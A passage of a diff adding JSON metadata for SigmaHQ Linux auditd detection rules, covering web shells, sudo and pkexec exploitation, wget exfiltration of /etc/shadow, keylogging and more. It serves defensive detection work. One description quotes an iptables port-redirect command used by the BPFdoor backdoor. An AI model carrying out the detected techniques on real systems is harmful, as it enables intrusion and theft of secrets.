"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ] + }, + "uuid": "a5a827d9-1bbe-4952-9293-c59d897eb41b", + "value": "Steganography Extract Files with Steghide" + }, + { + "description": "Detects loading of kernel modules with insmod command.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nAdversaries may use LKMs to obtain persistence within the system or elevate the privileges.\n", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/11/02", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_load_module_insmod.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md", + "https://attack.mitre.org/techniques/T1547/006/", + "https://linux.die.net/man/8/insmod", + "https://man7.org/linux/man-pages/man8/kmod.8.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.006" + ] + }, + "uuid": "106d7cbd-80ff-4985-b682-a7043e5acb72", + "value": "Loading of Kernel Module via Insmod" + }, + { + "description": "Detects possible command execution by web application/web shell", + "meta": { + "author": "Ilyas Ochkov, Beyu Denis, oscd.community", + "creation_date": "2019/10/12", + "falsepositive": [ + "Admin activity", + "Crazy web applications" + ], + "filename": "lnx_auditd_web_rce.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "Personal Experience of the Author", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_web_rce.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "c0d3734d-330f-4a03-aae2-65dacc6a8222", + "value": "Webshell Remote Command Execution" + }, + { + "description": "Detects exploitation attempt of the vulnerability described in CVE-2021-4034.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2022/01/27", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_cve_2021_4034.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://access.redhat.com/security/cve/CVE-2021-4034", + "https://github.com/berdav/CVE-2021-4034", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "40a016ab-4f48-4eee-adde-bbf612695c53", + "value": "Potential CVE-2021-4034 Exploitation Attempt" + }, + { + "description": "Detects adversary creating screen capture of a desktop with Import Tool.\nHighly recommended using rule on servers, due to high usage of screenshot utilities on user workstations.\nImageMagick must be installed.\n", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/21", + "falsepositive": [ + "Legitimate use of screenshot utility" + ], + "filename": "lnx_auditd_screencapture_import.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://linux.die.net/man/1/import", + "https://imagemagick.org/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", + "https://attack.mitre.org/techniques/T1113/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ] + }, + "uuid": "dbe4b9c5-c254-4258-9688-d6af0b7967fd", + "value": "Screen Capture with Import Tool" + }, + { + "description": "Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2022/01/22", + "falsepositive": [ + "Admin activity" + ], + "filename": "lnx_auditd_disable_system_firewall.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1562/004/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", + "https://firewalld.org/documentation/man-pages/firewall-cmd.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml" + ], + "tags": [ + "attack.t1562.004", + "attack.defense_evasion" + ] + }, + "uuid": "53059bc0-1472-438b-956a-7508a94a91f0", + "value": "Disable System Firewall" + }, + { + "description": "Detects extracting of zip file from image file", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/09", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_unzip_hidden_zip_files_steganography.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", + "https://attack.mitre.org/techniques/T1027/003/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ] + }, + "uuid": "edd595d7-7895-4fa7-acb3-85a18a8772ca", + "value": "Steganography Unzip Hidden Information From Picture File" + }, + { + "description": "Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/11/28", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_capabilities_discovery.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/", + "https://mn3m.info/posts/suid-vs-capabilities/", + "https://man7.org/linux/man-pages/man8/getcap.8.html", + "https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml" + ], + "tags": [ + "attack.collection", + "attack.privilege_escalation", + "attack.t1123", + "attack.t1548" + ] + }, + "uuid": "fe10751f-1995-40a5-aaa2-c97ccb4123fe", + "value": "Linux Capabilities Discovery" + }, + { + "description": "Detects system information discovery commands", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "lnx_auditd_system_info_discovery2.yml", + "level": "informational", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "1f358e2e-cb63-43c3-b575-dfb072a6814f", + "value": "System and Hardware Information Discovery" + }, + { + "description": "Detect changes in auditd configuration files", + "meta": { + "author": "Mikhail Larin, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "lnx_auditd_auditing_config_change.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "Self Experience", + "https://github.com/Neo23x0/auditd/blob/master/audit.rules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_auditing_config_change.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.006" + ] + }, + "uuid": "977ef627-4539-4875-adf4-ed8f780c4922", + "value": "Auditing Configuration Changes on Linux Host" + }, + { + "description": "Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_ld_so_preload_mod.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md", + "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.006" + ] + }, + "uuid": "4b3cb710-5e83-4715-8c45-8b2b5b3e5751", + "value": "Modification of ld.so.preload" + }, + { + "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.\nSeveral different variations of this technique have been observed.\n", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": "No established falsepositives", + "filename": "lnx_auditd_masquerading_crond.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "9d4548fa-bba0-4e88-bd66-5d5bf516cda0", + "value": "Masquerading as Linux Crond Process" + }, + { + "description": "Detects appending of zip file to image", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/09", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_hidden_zip_files_steganography.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", + "https://attack.mitre.org/techniques/T1027/003/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ] + }, + "uuid": "45810b50-7edc-42ca-813b-bdac02fb946b", + "value": "Steganography Hide Zip Information in Picture File" + }, + { + "description": "Detects commandline operations on shell history files", + "meta": { + "author": "Mikhail Larin, oscd.community", + "creation_date": "2020/10/17", + "falsepositive": [ + "Legitimate administrative activity", + "Legitimate software, cleaning hist file" + ], + "filename": "lnx_auditd_susp_histfile_operations.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.003" + ] + }, + "uuid": "eae8ce9f-bde9-47a6-8e79-f20d18419910", + "value": "Suspicious History File Operations - Linux" + }, + { + "description": "Detect file time attribute change to hide new or changes to existing files.", + "meta": { + "author": "Igor Fits, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_change_file_time_attr.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.006" + ] + }, + "uuid": "b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b", + "value": "File Time Attribute Change - Linux" + }, + { + "description": "Detects command line parameter very often used with coin miners", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/09", + "falsepositive": [ + "Other tools that use a --cpu-priority flag" + ], + "filename": "lnx_auditd_coinminer.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://xmrig.com/docs/miner/command-line-options", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_coinminer.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed", + "value": "Possible Coin Miner CPU Priority Param" + }, + { + "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing.\nrequired to trigger the heap-based buffer overflow.\n", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/02/01", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "cve.2021.3156" + ] + }, + "uuid": "b9748c98-9ea7-4fdb-80b6-29bed6ba71d2", + "value": "CVE-2021-3156 Exploitation Attempt Bruteforcing" + }, + { + "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Legitimate administrator or user uses network sniffing tool for legitimate reasons." + ], + "filename": "lnx_auditd_network_sniffing.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_sniffing.yml" + ], + "tags": [ + "attack.credential_access", + "attack.discovery", + "attack.t1040" + ] + }, + "uuid": "f4d3748a-65d1-4806-bd23-e25728081d01", + "value": "Network Sniffing - Linux" + }, + { + "description": "Detects attempts to post the file with the usage of wget utility.\nThe adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.\n", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/11/18", + "falsepositive": [ + "Legitimate usage of wget utility to post a file" + ], + "filename": "lnx_auditd_data_exfil_wget.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/tactics/TA0010/", + "https://linux.die.net/man/1/wget", + "https://gtfobins.github.io/gtfobins/wget/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "cb39d16b-b3b6-4a7a-8222-1cf24b686ffc", + "value": "Data Exfiltration with Wget" + }, + { + "description": "Detects a reload or a start of a service.", + "meta": { + "author": "Jakob Weinzettl, oscd.community", + "creation_date": "2019/09/23", + "falsepositive": [ + "Installation of legitimate service.", + "Legitimate reconfiguration of service." + ], + "filename": "lnx_auditd_pers_systemd_reload.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", + "https://attack.mitre.org/techniques/T1543/002/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.002" + ] + }, + "uuid": "2625cc59-0634-40d0-821e-cb67382a3dd7", + "value": "Systemd Service Reload or Start" + }, + { + "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", + "meta": { + "author": "Igor Fits, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "lnx_auditd_split_file_into_pieces.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1030" + ] + }, + "uuid": "2dad0cba-c62a-4a4f-949f-5f6ecd619769", + "value": "Split A File Into Pieces - Linux" + }, + { + "description": "Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/10/01", + "falsepositive": [ + "Legitimate usage of xclip tools" + ], + "filename": "lnx_auditd_clipboard_image_collection.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://linux.die.net/man/1/xclip", + "https://attack.mitre.org/techniques/T1115/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ] + }, + "uuid": "f200dc3f-b219-425d-a17e-c38467364816", + "value": "Clipboard Collection of Image Data with Xclip Tool" + }, + { + "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing\nrequired to trigger the heap-based buffer overflow.\n", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/02/01", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "cve.2021.3156" + ] + }, + "uuid": "5ee37487-4eb8-4ac2-9be1-d7d14cdc559f", + "value": "CVE-2021-3156 Exploitation Attempt" + }, + { + "description": "All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'\nThe traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.\n", + "meta": { + "author": "Rafal Piasecki", + "creation_date": "2022/08/10", + "falsepositive": [ + "Legitimate ports redirect" + ], + "filename": "lnx_auditd_bpfdoor_port_redirect.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", + "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "70b4156e-50fc-4523-aa50-c9dddf1993fc", + "value": "Bpfdoor TCP Ports Redirect" + }, + { + "description": "Detects program executions in suspicious non-program folders related to malware or hacking activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/01/23", + "falsepositive": [ + "Admin activity (especially in /tmp folders)", + "Crazy web applications" + ], + "filename": "lnx_auditd_susp_exe_folders.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml" + ], + "tags": [ + "attack.t1587", + "attack.t1584", + "attack.resource_development" + ] + }, + "uuid": "a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc", + "value": "Program Executions in Suspicious Folders" + }, + { + "description": "Detects removing immutable file attribute.", + "meta": { + "author": "Jakob Weinzettl, oscd.community", + "creation_date": "2019/09/23", + "falsepositive": [ + "Administrator interacting with immutable files (e.g. for instance backups)." + ], + "filename": "lnx_auditd_chattr_immutable_removal.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ] + }, + "uuid": "a5b977d6-8a81-4475-91b9-49dbfcd941f7", + "value": "Remove Immutable File Attribute - Auditd" + }, + { + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Legitimate use of archiving tools by legitimate user." + ], + "filename": "lnx_auditd_data_compressed.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_compressed.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1560.001" + ] + }, + "uuid": "a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", + "value": "Data Compressed" + }, + { + "description": "Detects enumeration of local or remote network services.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/21", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "lnx_auditd_network_service_scanning.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_service_scanning.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ] + }, + "uuid": "3761e026-f259-44e6-8826-719ed8079408", + "value": "Linux Network Service Scanning - Auditd" + }, + { + "description": "Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/13", + "falsepositive": [ + "Legitimate use of screenshot utility" + ], + "filename": "lnx_auditd_screencaputre_xwd.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://linux.die.net/man/1/xwd", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture", + "https://attack.mitre.org/techniques/T1113/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ] + }, + "uuid": "e2f17c5d-b02a-442b-9052-6eb89c9fec9c", + "value": "Screen Capture with Xwd" + }, + { + "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", + "meta": { + "author": "Igor Fits, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "lnx_auditd_system_shutdown_reboot.yml", + "level": "informational", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml" + ], + "tags": [ + "attack.impact", + "attack.t1529" + ] + }, + "uuid": "4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f", + "value": "System Shutdown/Reboot - Linux" + }, + { + "description": "Detects access to a raw disk on a host to evade detection by security products.", + "meta": { + "author": "Janantha Marasinghe", + "creation_date": "2022/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_debugfs_usage.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://twitter.com/0xm1rch/status/1600857731073654784?s=20&t=MdrBPqv4hnBEfAJBayMCZA", + "https://github.com/Neo23x0/auditd/blob/master/audit.rules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_debugfs_usage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1006" + ] + }, + "uuid": "fb0647d7-371a-4553-8e20-33bbbe122956", + "value": "Use of Debugfs to Access a Raw Disk" + }, + { + "description": "Detects password policy discovery commands", + "meta": { + "author": "Ömer Günal, oscd.community, Pawel Mazur", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "lnx_auditd_password_policy_discovery.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu", + "https://man7.org/linux/man-pages/man1/passwd.1.html", + "https://attack.mitre.org/techniques/T1201/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md", + "https://linux.die.net/man/1/chage", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1201" + ] + }, + "uuid": "ca94a6db-8106-4737-9ed2-3e3bb826af0a", + "value": "Password Policy Discovery" + }, + { + "description": "Detects System Information Discovery commands", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/03", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "lnx_auditd_system_info_discovery.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md", + "https://attack.mitre.org/techniques/T1082/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "f34047d9-20d3-4e8b-8672-0a35cc50dc71", + "value": "System Information Discovery - Auditd" + }, + { + "description": "Detects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell.", + "meta": { + "author": "Peter Matkovski", + "creation_date": "2019/05/12", + "falsepositive": [ + "Admin or User activity" + ], + "filename": "lnx_auditd_alter_bash_profile.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "MITRE Attack technique T1156; .bash_profile and .bashrc. ", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_alter_bash_profile.yml" + ], + "tags": [ + "attack.s0003", + "attack.persistence", + "attack.t1546.004" + ] + }, + "uuid": "e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9", + "value": "Edit of .bash_profile and .bashrc" + }, + { + "description": "Detects overwriting (effectively wiping/deleting) of a file.", + "meta": { + "author": "Jakob Weinzettl, oscd.community", + "creation_date": "2019/10/23", + "falsepositive": [ + "Appending null bytes to files.", + "Legitimate overwrite of files." + ], + "filename": "lnx_auditd_dd_delete_file.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_dd_delete_file.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "37222991-11e9-4b6d-8bdf-60fbe48f753e", + "value": "Overwriting the File with Dev Zero or Null" + }, + { + "description": "Detect attempt to enable auditing of TTY input", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/05/24", + "falsepositive": [ + "Administrative work" + ], + "filename": "lnx_auditd_keylogging_with_pam_d.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1003/", + "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing", + "https://linux.die.net/man/8/pam_tty_audit", + "https://access.redhat.com/articles/4409591#audit-record-types-2", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1056.001" + ] + }, + "uuid": "49aae26c-450e-448b-911d-b3c13d178dfc", + "value": "Linux Keylogging with Pam.d" + }, + { + "description": "Detects relevant commands often related to malware or hacking activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/12/12", + "falsepositive": [ + "Admin activity" + ], + "filename": "lnx_auditd_susp_cmds.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "Internal Research - mostly derived from exploit code including code in MSF", + 